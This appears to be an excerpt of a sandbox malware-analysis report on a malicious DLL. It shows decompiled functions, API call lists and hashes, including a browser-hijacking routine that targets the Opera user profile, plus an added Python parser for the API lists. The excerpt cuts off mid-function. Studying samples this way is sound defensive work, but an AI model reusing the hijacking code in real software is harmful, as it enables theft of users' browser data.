                                                  • String ID: .\task_cookie\default_browser.cpp$OperaUserPath$[HIJACK][%s][%s][%d]: strOperaUserPath = %s$\Opera Software\Opera Stable
                                                  • API String ID: 540892888-3178255495
                                                  • Opcode ID: 7951e80b4ecc7e208796e453a21af3c16cf30cc148f99e517ed51d0c55d0e4ef
                                                  • Instruction ID: 95bf60a413d9745c220dda7655d86f48f1631bb9b4c777794abd3e1b2b92f022
                                                  • Opcode Fuzzy Hash: 7951e80b4ecc7e208796e453a21af3c16cf30cc148f99e517ed51d0c55d0e4ef
                                                  • Instruction Fuzzy Hash: 7C019679D04218A7E710EB60DC86FDA7778EB25700F4041C4FA89AA5C1EBF56AD48FA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E1000EC00(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _t23;
                                                  				char* _t27;
                                                  				intOrPtr* _t30;
                                                  				intOrPtr _t32;
                                                  				intOrPtr _t35;
                                                  
                                                  				_push(__ecx);
                                                  				_v8 = __ecx;
                                                  				_t23 = E1000F9B0(_v8, __eflags,  *((intOrPtr*)(E1000F4A0(_a4))),  *((intOrPtr*)(_v8 + 4)));
                                                  				 *((intOrPtr*)(E1000F4A0(_v8))) = _t23;
                                                  				 *((intOrPtr*)(_v8 + 8)) = E1000D5C0(_a4);
                                                  				_t27 = E1000E8B0( *((intOrPtr*)(E1000F4A0(_v8))));
                                                  				_t68 =  *_t27;
                                                  				if( *_t27 != 0) {
                                                  					 *((intOrPtr*)(E1000F2B0(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                  					_t30 = E1000F480(_v8);
                                                  					 *_t30 =  *((intOrPtr*)(_v8 + 4));
                                                  				} else {
                                                  					_t32 = E1000F440(_t68,  *((intOrPtr*)(E1000F4A0(_v8))));
                                                  					 *((intOrPtr*)(E1000F2B0(_v8))) = _t32;
                                                  					_t35 = E1000F400(_t68,  *((intOrPtr*)(E1000F4A0(_v8))));
                                                  					_t30 = E1000F480(_v8);
                                                  					 *_t30 = _t35;
                                                  				}
                                                  				return _t30;
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Handle
                                                  • String ID:
                                                  • API String ID: 2519475695-0
                                                  • Opcode ID: 873d2b5cd8dd77ec5e4f4f390e9462cb508c006000b0f7c610468eb1e551d27c
                                                  • Instruction ID: 25c4875d66efe198f66daf33b7a9bdd850e983ba3eb6b087f77aa2fcdf92ed4e
                                                  • Opcode Fuzzy Hash: 873d2b5cd8dd77ec5e4f4f390e9462cb508c006000b0f7c610468eb1e551d27c
                                                  • Instruction Fuzzy Hash: 0521ECB9910104EFE704DB58C99286F77B5EF8938472041ACE8055B769DB31BE01EBD1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E100A9490(void* __edi) {
                                                  				long _v8;
                                                  				void* _v12;
                                                  				struct _SECURITY_ATTRIBUTES _v24;
                                                  				void* _t14;
                                                  				void* _t26;
                                                  				void* _t27;
                                                  
                                                  				_t26 = __edi;
                                                  				_v12 = OpenFileMappingA(6, 0, "ff_signature");
                                                  				_v8 = 0;
                                                  				if(_v12 == 0) {
                                                  					_v8 = 1;
                                                  					_v24.nLength = 0xc;
                                                  					_v24.lpSecurityDescriptor = 0;
                                                  					_v24.bInheritHandle = 1;
                                                  					_v12 = CreateFileMappingA(0xffffffff,  &_v24, 4, 0, 0x400, "ff_signature");
                                                  					E100A93F0(_v12);
                                                  					_t27 = _t27 + 4;
                                                  				}
                                                  				_t14 = MapViewOfFile(_v12, 6, 0, 0, 0x400);
                                                  				 *0x10404ec4 = _t14;
                                                  				if(_v8 != 0) {
                                                  					 *( *0x10404ec4) = 0;
                                                  					E10025A10(_t26,  *0x10404ec4 + 4, 0, 0x3e8);
                                                  					return FlushViewOfFile( *0x10404ec4, 0x3ec);
                                                  				}
                                                  				return _t14;
                                                  			}

                                                  APIs
                                                  • OpenFileMappingA.KERNEL32 ref: 100A949F
                                                  • CreateFileMappingA.KERNEL32 ref: 100A94E5
                                                    • Part of subcall function 100A93F0: GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,00000000), ref: 100A9446
                                                    • Part of subcall function 100A93F0: SetSecurityInfo.ADVAPI32(00000000,00000006,00000010,00000000,00000000,00000000,00000000), ref: 100A9462
                                                    • Part of subcall function 100A93F0: LocalFree.KERNEL32(00000000), ref: 100A947B
                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000400), ref: 100A9509
                                                  • _memset.LIBCMT ref: 100A9536
                                                  • FlushViewOfFile.KERNEL32(?,000003EC), ref: 100A954A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$MappingSecurityView$CreateDescriptorFlushFreeInfoLocalOpenSacl_memset
                                                  • String ID: ff_signature$ff_signature
                                                  • API String ID: 16605680-3114255398
                                                  • Opcode ID: e0ae191729b4b01387e7f1508b6b6fb81772dcd73ea6a32ee894798f85d08583
                                                  • Instruction ID: a7db16a1703d1c331ef1490eab614682afc5956ba7178999b4c3ac2ca2649a10
                                                  • Opcode Fuzzy Hash: e0ae191729b4b01387e7f1508b6b6fb81772dcd73ea6a32ee894798f85d08583
                                                  • Instruction Fuzzy Hash: DE118FB8A40304FBE700DFA4CD8AB9E7BB5FB44709F104254F6057A2C5D7B56A40CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E1014B0E0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                  				char _v8;
                                                  				intOrPtr _v16;
                                                  				char _v280;
                                                  				char _v540;
                                                  				char _v800;
                                                  				char _v804;
                                                  				char _v820;
                                                  				char _v824;
                                                  				char _v828;
                                                  				char _v832;
                                                  				signed int _v836;
                                                  				char _v840;
                                                  				char _v844;
                                                  				char _v848;
                                                  				char _v852;
                                                  				char _v884;
                                                  				char _v912;
                                                  				char _v948;
                                                  				char _v976;
                                                  				intOrPtr _v980;
                                                  				intOrPtr _v984;
                                                  				intOrPtr _v988;
                                                  				signed int _v992;
                                                  				void* __ebp;
                                                  				signed char _t102;
                                                  				intOrPtr _t116;
                                                  				intOrPtr _t133;
                                                  				intOrPtr _t135;
                                                  				void* _t136;
                                                  				signed int _t163;
                                                  				signed int _t165;
                                                  				void* _t180;
                                                  				void* _t181;
                                                  				intOrPtr _t182;
                                                  				void* _t183;
                                                  
                                                  				_t181 = __esi;
                                                  				_t180 = __edi;
                                                  				_t136 = __ebx;
                                                  				 *[fs:0x0] = _t182;
                                                  				_t183 = _t182 - 0x3d0;
                                                  				_v992 = 0;
                                                  				_v824 = 0;
                                                  				_v832 = 0;
                                                  				E10015780( &_v820, __eflags);
                                                  				_v8 = 0;
                                                  				_v832 =  *0x104027dc(0,  &_v824,  &_v828,  *[fs:0x0], 0x1016b78e, 0xffffffff);
                                                  				if(_v832 != 0) {
                                                  					L31:
                                                  					E100157B0(_a4, _t163, __eflags,  &_v820);
                                                  					_t165 = _v992 | 0x00000001;
                                                  					__eflags = _t165;
                                                  					_v992 = _t165;
                                                  					_v8 = 0xffffffff;
                                                  					E10015890( &_v820);
                                                  					 *[fs:0x0] = _v16;
                                                  					return _a4;
                                                  				}
                                                  				_v836 = 0;
                                                  				while(_v836 < _v824) {
                                                  					_v832 =  *0x104026cc((_v836 << 4) + _v828, 0,  &_v804);
                                                  					if(_v832 != 0) {
                                                  						L30:
                                                  						_t163 = _v836 + 1;
                                                  						__eflags = _t163;
                                                  						_v836 = _t163;
                                                  						continue;
                                                  					}
                                                  					_v832 =  *0x104027e0(_v804, 0x200,  &_v844,  &_v840);
                                                  					if(_v832 != 0) {
                                                  						L29:
                                                  						 *0x104027d8(_v804);
                                                  						goto L30;
                                                  					}
                                                  					_v848 = 0;
                                                  					while(_v848 < _v844) {
                                                  						E10015670( &_v976);
                                                  						_v8 = 1;
                                                  						_v852 = 0;
                                                  						E10025A10(_t180,  &_v976, 0, 0x78);
                                                  						_t183 = _t183 + 0xc;
                                                  						_t102 = E10015650();
                                                  						_t197 = _t102 & 0x000000ff;
                                                  						if((_t102 & 0x000000ff) == 0) {
                                                  							__eflags = E10015630() & 0x000000ff;
                                                  							if(__eflags != 0) {
                                                  								_t133 = E1014AFD0(_t136, _t180, _t181, __eflags, _v804, _v840, _v848,  &_v976);
                                                  								_t183 = _t183 + 0x10;
                                                  								_v852 = _t133;
                                                  							}
                                                  						} else {
                                                  							_t135 = E1014AEB0(_t136, _t180, _t181, _t197, _v804, _v840, _v848,  &_v976);
                                                  							_t183 = _t183 + 0x10;
                                                  							_v852 = _t135;
                                                  						}
                                                  						if(_v852 != 0 && E10002430( &_v948) > 0 && E10002430( &_v912) > 0 && E10002430( &_v884) > 0) {
                                                  							_v984 = E10145FC0(_t136, _t180, _t181, E10015760( &_v948));
                                                  							_v988 = E10145FC0(_t136, _t180, _t181, E10015760( &_v912));
                                                  							_t116 = E10145FC0(_t136, _t180, _t181, E10015760( &_v884));
                                                  							_t183 = _t183 + 0xc;
                                                  							_v980 = _t116;
                                                  							if(_v984 != 0 && _v988 != 0) {
                                                  								_t204 = _v980;
                                                  								if(_v980 != 0) {
                                                  									E10025A10(_t180,  &_v800, 0, 0x104);
                                                  									E10025A10(_t180,  &_v540, 0, 0x104);
                                                  									E10025A10(_t180,  &_v280, 0, 0x104);
                                                  									E10025A8A( &_v800,  &_v800, 0x104, _v984);
                                                  									E10025A8A( &_v800,  &_v540, 0x104, _v988);
                                                  									E10025A8A(_v980,  &_v280, 0x104, _v980);
                                                  									_t183 = _t183 + 0x48;
                                                  									E10015A40( &_v820, _v980, _t204,  &_v800);
                                                  								}
                                                  							}
                                                  							_t205 = _v984;
                                                  							if(_v984 != 0) {
                                                  								_push(_v984);
                                                  								E100252D1(_t136, _t180, _t181, _t205);
                                                  								_t183 = _t183 + 4;
                                                  							}
                                                  							_t206 = _v988;
                                                  							if(_v988 != 0) {
                                                  								_push(_v988);
                                                  								E100252D1(_t136, _t180, _t181, _t206);
                                                  								_t183 = _t183 + 4;
                                                  							}
                                                  							_t207 = _v980;
                                                  							if(_v980 != 0) {
                                                  								_push(_v980);
                                                  								E100252D1(_t136, _t180, _t181, _t207);
                                                  								_t183 = _t183 + 4;
                                                  							}
                                                  						}
                                                  						_v8 = 0;
                                                  						E100156B0( &_v976);
                                                  						_v848 = _v848 + 1;
                                                  					}
                                                  					 *0x104027e4(_v840);
                                                  					goto L29;
                                                  				}
                                                  				goto L31;
                                                  			}

                                                   Instruction addresses (one per statement of the decompiled code above, in source order):
                                                  0x1014b0e0
                                                  0x1014b0e0
                                                  0x1014b0e0
                                                  0x1014b0f1
                                                  0x1014b0f8
                                                  0x1014b0fe
                                                  0x1014b108
                                                  0x1014b112
                                                  0x1014b122
                                                  0x1014b127
                                                  0x1014b144
                                                  0x1014b151
                                                  0x1014b48b
                                                  0x1014b495
                                                  0x1014b4a0
                                                  0x1014b4a0
                                                  0x1014b4a3
                                                  0x1014b4a9
                                                  0x1014b4b6
                                                  0x1014b4c1
                                                  0x1014b4cb
                                                  0x1014b4cb
                                                  0x1014b157
                                                  0x1014b172
                                                  0x1014b1a3
                                                  0x1014b1b0
                                                  0x1014b486
                                                  0x1014b169
                                                  0x1014b169
                                                  0x1014b16c
                                                  0x00000000
                                                  0x1014b16c
                                                  0x1014b1d6
                                                  0x1014b1e3
                                                  0x1014b479
                                                  0x1014b480
                                                  0x00000000
                                                  0x1014b480
                                                  0x1014b1e9
                                                  0x1014b204
                                                  0x1014b21c
                                                  0x1014b221
                                                  0x1014b225
                                                  0x1014b23a
                                                  0x1014b23f
                                                  0x1014b242
                                                  0x1014b24a
                                                  0x1014b24c
                                                  0x1014b282
                                                  0x1014b284
                                                  0x1014b2a2
                                                  0x1014b2a7
                                                  0x1014b2aa
                                                  0x1014b2aa
                                                  0x1014b24e
                                                  0x1014b26a
                                                  0x1014b26f
                                                  0x1014b272
                                                  0x1014b272
                                                  0x1014b2b7
                                                  0x1014b30a
                                                  0x1014b324
                                                  0x1014b336
                                                  0x1014b33b
                                                  0x1014b33e
                                                  0x1014b34b
                                                  0x1014b35e
                                                  0x1014b365
                                                  0x1014b379
                                                  0x1014b38f
                                                  0x1014b3a5
                                                  0x1014b3c0
                                                  0x1014b3db
                                                  0x1014b3f6
                                                  0x1014b3fb
                                                  0x1014b40b
                                                  0x1014b40b
                                                  0x1014b365
                                                  0x1014b410
                                                  0x1014b417
                                                  0x1014b41f
                                                  0x1014b420
                                                  0x1014b425
                                                  0x1014b425
                                                  0x1014b428
                                                  0x1014b42f
                                                  0x1014b437
                                                  0x1014b438
                                                  0x1014b43d
                                                  0x1014b43d
                                                  0x1014b440
                                                  0x1014b447
                                                  0x1014b44f
                                                  0x1014b450
                                                  0x1014b455
                                                  0x1014b455
                                                  0x1014b447
                                                  0x1014b458
                                                  0x1014b462
                                                  0x1014b1fe
                                                  0x1014b1fe
                                                  0x1014b473
                                                  0x00000000
                                                  0x1014b473
                                                  0x00000000

                                                  APIs
                                                  • _memset.LIBCMT ref: 1014B23A
                                                  • _memset.LIBCMT ref: 1014B379
                                                  • _memset.LIBCMT ref: 1014B38F
                                                  • _memset.LIBCMT ref: 1014B3A5
                                                  • _strcpy_s.LIBCMT ref: 1014B3C0
                                                  • _strcpy_s.LIBCMT ref: 1014B3DB
                                                  • _strcpy_s.LIBCMT ref: 1014B3F6
                                                    • Part of subcall function 1014AEB0: _memcmp.LIBCMT ref: 1014AECE
                                                    • Part of subcall function 100252D1: __lock.LIBCMT ref: 100252EF
                                                    • Part of subcall function 100252D1: ___sbh_find_block.LIBCMT ref: 100252FA
                                                    • Part of subcall function 100252D1: ___sbh_free_block.LIBCMT ref: 10025309
                                                    • Part of subcall function 100252D1: HeapFree.KERNEL32(00000000,100235AB,1027D170,Function_000252D1,1002DFFD,00000000,1027D5F0,0000000C,1002E035,100235AB,40182005,100235AB,10025381,00000004,1027D190,0000000C), ref: 10025339
                                                    • Part of subcall function 100252D1: GetLastError.KERNEL32(?,00000003,?,?,100235AB,00000000,10001F33,00000000,00000000), ref: 1002534A
                                                  Memory Dump Source
                                                   • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated dumps: identical to the list given for the preceding function
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _memset$_strcpy_s$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lock_memcmp
                                                  • String ID:
                                                  • API String ID: 1867732891-0
                                                  • Opcode ID: a8d626c00f76823934735d86975984973dd6a153f2b5ca6ed7c630006f6af6e3
                                                  • Instruction ID: 55d678435bdf5076dddb917c4b4cd6dc7b2d9186f5678cc075fa9f6bf607515f
                                                  • Opcode Fuzzy Hash: a8d626c00f76823934735d86975984973dd6a153f2b5ca6ed7c630006f6af6e3
                                                  • Instruction Fuzzy Hash: C0916BB5C102289BDB26DB60DDC6BD9B3BCFB04300F5445E9E10AAA191EB75AF84CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
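The per-function "APIs" blocks in this report are plain text, which makes them awkward to cross-check by hand: a line marked "Part of subcall function" belongs to a callee, and a direct entry should have its `ref:` address inside the function's own code range. The parser below is an added example and is not part of the Joe Sandbox output. Its sample input is constructed from lines copied from the listings above (the E1014B0E0 entries, plus the MapViewOfFile line that the report lists for the preceding function, deliberately mixed in to exercise the range check), and the code range 0x1014B0E0-0x1014B4CB is taken from the instruction addresses listed for E1014B0E0.

```python
"""Parser for the per-function "APIs" lists in this report.

Added example, not part of the Joe Sandbox output. It turns lines such as

    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000400), ref: 100A9509
    • _memset.LIBCMT ref: 1014B23A
    • Part of subcall function 1014AEB0: _memcmp.LIBCMT ref: 1014AECE

into records and checks that every direct (non-subcall) reference address
lies inside the function's own code range, which exposes entries that were
pasted in from another function's listing.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: lines copied from the E1014B0E0 listing above, plus the
# MapViewOfFile line from the preceding function to exercise the range check
# (it does not belong to E1014B0E0).
SAMPLE = """\
• _memset.LIBCMT ref: 1014B23A
• _strcpy_s.LIBCMT ref: 1014B3C0
  • Part of subcall function 1014AEB0: _memcmp.LIBCMT ref: 1014AECE
  • Part of subcall function 100252D1: HeapFree.KERNEL32(00000000,100235AB,1027D170,Function_000252D1), ref: 10025339
  • Part of subcall function 100252D1: GetLastError.KERNEL32(?,00000003,?,?,100235AB,00000000,10001F33,00000000,00000000), ref: 1002534A
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000400), ref: 100A9509
"""

# Code range of E1014B0E0, taken from the instruction addresses listed for it.
E1014B0E0_RANGE = (0x1014B0E0, 0x1014B4CB)


@dataclass
class ApiRef:
    name: str                  # API or CRT symbol, e.g. "HeapFree"
    module: str                # "KERNEL32", "LIBCMT", ...
    args: List[str]            # raw argument tokens as printed ("?" = unknown)
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # callee address for "Part of subcall function" lines


_LINE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<sub>[0-9A-Fa-f]+):\s*)?
        (?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)
        (?:\((?P<args>[^)]*)\))?
        ,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$""",
    re.VERBOSE,
)


def parse_api_lines(text: str) -> List[ApiRef]:
    """Parse one APIs block; raises ValueError on a line it cannot read."""
    refs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = _LINE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        refs.append(ApiRef(
            name=m["name"],
            module=m["module"],
            args=args,
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return refs


def direct_calls(refs: List[ApiRef]) -> List[ApiRef]:
    """Entries the report attributes to the function itself, not to a callee."""
    return [r for r in refs if r.subcall_of is None]


def refs_outside_range(refs: List[ApiRef], code_range) -> List[str]:
    """Names of direct references whose call site is not inside code_range."""
    lo, hi = code_range
    return [r.name for r in direct_calls(refs) if not lo <= r.ref <= hi]


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for r in parsed:
        tag = f" (via {r.subcall_of:08X})" if r.subcall_of is not None else ""
        print(f"{r.ref:08X} {r.module}!{r.name}{tag} args={len(r.args)}")
    print("outside E1014B0E0:", refs_outside_range(parsed, E1014B0E0_RANGE))
```

Argument tokens are kept as printed: the report's "?" stands for a value the sandbox could not resolve, and a token such as Function_000252D1 is a symbol rather than an immediate, so they are strings rather than parsed integers. Subcall lines are kept but excluded from the range check, since their call sites legitimately lie in the callee.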

                                                  C-Code - Quality: 88%
                                                  			E100052F0(intOrPtr __ecx, signed int _a4, signed char _a8) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v16;
                                                  				char _v56;
                                                  				char _v84;
                                                  				char _v124;
                                                  				char _v152;
                                                  				char _v192;
                                                  				char _v220;
                                                  				intOrPtr _v224;
                                                  				intOrPtr _t43;
                                                  				intOrPtr _t85;
                                                  
                                                  				_push(0xffffffff);
                                                  				_push(0x10170a1e);
                                                  				_push( *[fs:0x0]);
                                                  				 *[fs:0x0] = _t85;
                                                  				_v224 = __ecx;
                                                  				 *(_v224 + 8) = _a4 & 0x00000017;
                                                  				_t43 = _v224;
                                                  				if(( *(_v224 + 8) &  *(_t43 + 0xc)) != 0) {
                                                  					if((_a8 & 0x000000ff) == 0) {
                                                  						if(( *(_v224 + 8) &  *(_v224 + 0xc) & 0x00000004) == 0) {
                                                  							if(( *(_v224 + 8) &  *(_v224 + 0xc) & 0x00000002) == 0) {
                                                  								E10001320( &_v220, "ios_base::eofbit set");
                                                  								_v8 = 2;
                                                  								E10005280( &_v192,  &_v220);
                                                  								E10028911( &_v192, 0x1027f3c0);
                                                  								_v8 = 0xffffffff;
                                                  								_t43 = E10001360( &_v220);
                                                  							} else {
                                                  								E10001320( &_v152, "ios_base::failbit set");
                                                  								_v8 = 1;
                                                  								E10005280( &_v124,  &_v152);
                                                  								E10028911( &_v124, 0x1027f3c0);
                                                  								_v8 = 0xffffffff;
                                                  								_t43 = E10001360( &_v152);
                                                  							}
                                                  						} else {
                                                  							E10001320( &_v84, "ios_base::badbit set");
                                                  							_v8 = 0;
                                                  							E10005280( &_v56,  &_v84);
                                                  							E10028911( &_v56, 0x1027f3c0);
                                                  							_v8 = 0xffffffff;
                                                  							_t43 = E10001360( &_v84);
                                                  						}
                                                  					} else {
                                                  						_t43 = E10028911(0, 0);
                                                  					}
                                                  				}
                                                  				 *[fs:0x0] = _v16;
                                                  				return _t43;
                                                  			}

                                                   Instruction addresses (one per statement of the decompiled code above, in source order):
                                                  0x100052f3
                                                  0x100052f5
                                                  0x10005300
                                                  0x10005301
                                                  0x1000530e
                                                  0x10005320
                                                  0x10005329
                                                  0x10005335
                                                  0x10005342
                                                  0x10005367
                                                  0x100053c0
                                                  0x10005415
                                                  0x1000541a
                                                  0x1000542e
                                                  0x1000543f
                                                  0x10005444
                                                  0x10005451
                                                  0x100053c2
                                                  0x100053cd
                                                  0x100053d2
                                                  0x100053e3
                                                  0x100053f1
                                                  0x100053f6
                                                  0x10005403
                                                  0x10005403
                                                  0x10005369
                                                  0x10005371
                                                  0x10005376
                                                  0x10005384
                                                  0x10005392
                                                  0x10005397
                                                  0x100053a1
                                                  0x100053a1
                                                  0x10005344
                                                  0x10005348
                                                  0x10005348
                                                  0x10005342
                                                  0x10005459
                                                  0x10005463

                                                  Strings
                                                  Memory Dump Source
                                                   • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated dumps: identical to the list given for the first function above
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 0-1866435925
                                                  • Opcode ID: c4a3a4033d4cc79ad8aed1496fe4e14b9f4e9391bfa0bfae04132b05894cf149
                                                  • Instruction ID: 194b55b84aa060c8fe605b8bd120f7d4bcca4070c16de79cddad464b04800f54
                                                  • Opcode Fuzzy Hash: c4a3a4033d4cc79ad8aed1496fe4e14b9f4e9391bfa0bfae04132b05894cf149
                                                  • Instruction Fuzzy Hash: 56414C35805258EBE714CB90CC51FDEB370EB11390F54C29AA4192B285DB316F85CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E10037338(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                  				char _v8;
                                                  				signed int _v12;
                                                  				char _v20;
                                                  				char _t43;
                                                  				char _t46;
                                                  				signed int _t53;
                                                  				signed int _t54;
                                                  				intOrPtr _t56;
                                                  				int _t57;
                                                  				int _t58;
                                                  				signed short* _t59;
                                                  				short* _t60;
                                                  				int _t65;
                                                  				char* _t72;
                                                  
                                                  				_t72 = _a8;
                                                  				if(_t72 == 0 || _a12 == 0) {
                                                  					L5:
                                                  					return 0;
                                                  				} else {
                                                  					if( *_t72 != 0) {
                                                  						E100239FC( &_v20, __edi, _a16);
                                                  						_t43 = _v20;
                                                  						__eflags =  *(_t43 + 0x14);
                                                  						if( *(_t43 + 0x14) != 0) {
                                                  							_t46 = E1002F207( *_t72 & 0x000000ff,  &_v20);
                                                  							__eflags = _t46;
                                                  							if(_t46 == 0) {
                                                  								__eflags = _a4;
                                                  								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                  								if(__eflags != 0) {
                                                  									L10:
                                                  									__eflags = _v8;
                                                  									if(_v8 != 0) {
                                                  										_t53 = _v12;
                                                  										_t11 = _t53 + 0x70;
                                                  										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                  										__eflags =  *_t11;
                                                  									}
                                                  									return 1;
                                                  								}
                                                  								L21:
                                                  								_t54 = L10028DE9(__eflags);
                                                  								 *_t54 = 0x2a;
                                                  								__eflags = _v8;
                                                  								if(_v8 != 0) {
                                                  									_t54 = _v12;
                                                  									_t33 = _t54 + 0x70;
                                                  									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                  									__eflags =  *_t33;
                                                  								}
                                                  								return _t54 | 0xffffffff;
                                                  							}
                                                  							_t56 = _v20;
                                                  							_t65 =  *(_t56 + 0xac);
                                                  							__eflags = _t65 - 1;
                                                  							if(_t65 <= 1) {
                                                  								L17:
                                                  								__eflags = _a12 -  *(_t56 + 0xac);
                                                  								if(__eflags < 0) {
                                                  									goto L21;
                                                  								}
                                                  								__eflags = _t72[1];
                                                  								if(__eflags == 0) {
                                                  									goto L21;
                                                  								}
                                                  								L19:
                                                  								__eflags = _v8;
                                                  								_t57 =  *(_t56 + 0xac);
                                                  								if(_v8 == 0) {
                                                  									return _t57;
                                                  								}
                                                  								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                  								return _t57;
                                                  							}
                                                  							__eflags = _a12 - _t65;
                                                  							if(_a12 < _t65) {
                                                  								goto L17;
                                                  							}
                                                  							__eflags = _a4;
                                                  							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                  							__eflags = _t58;
                                                  							_t56 = _v20;
                                                  							if(_t58 != 0) {
                                                  								goto L19;
                                                  							}
                                                  							goto L17;
                                                  						}
                                                  						_t59 = _a4;
                                                  						__eflags = _t59;
                                                  						if(_t59 != 0) {
                                                  							 *_t59 =  *_t72 & 0x000000ff;
                                                  						}
                                                  						goto L10;
                                                  					} else {
                                                  						_t60 = _a4;
                                                  						if(_t60 != 0) {
                                                  							 *_t60 = 0;
                                                  						}
                                                  						goto L5;
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10037368
                                                  • __isleadbyte_l.LIBCMT ref: 1003739C
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?), ref: 100373CD
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?), ref: 1003743B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID: F*
                                                  • API String ID: 3058430110-2578036169
                                                  • Opcode ID: 5ca73737bb46f59e5341071ca7a228a1587cbc3b8c434691c6ee7ad55b545def
                                                  • Instruction ID: 1022e888aa7a284cd680d65924dd5e65059e2054748a369e51e528b26a84b84c
                                                  • Opcode Fuzzy Hash: 5ca73737bb46f59e5341071ca7a228a1587cbc3b8c434691c6ee7ad55b545def
                                                  • Instruction Fuzzy Hash: BF319231901296EFDB22DF64CC819AD7BF5FF01252F1685A9E8688F191E330EE40EB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 62%
                                                  			E10015470(void* __eflags, signed int _a4, signed int _a8, signed short _a12) {
                                                  				_Unknown_base(*)()* _v8;
                                                  				signed short _v24;
                                                  				intOrPtr _v292;
                                                  				char _v296;
                                                  				char _v300;
                                                  				void* _t36;
                                                  
                                                  				_v8 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlGetVersion");
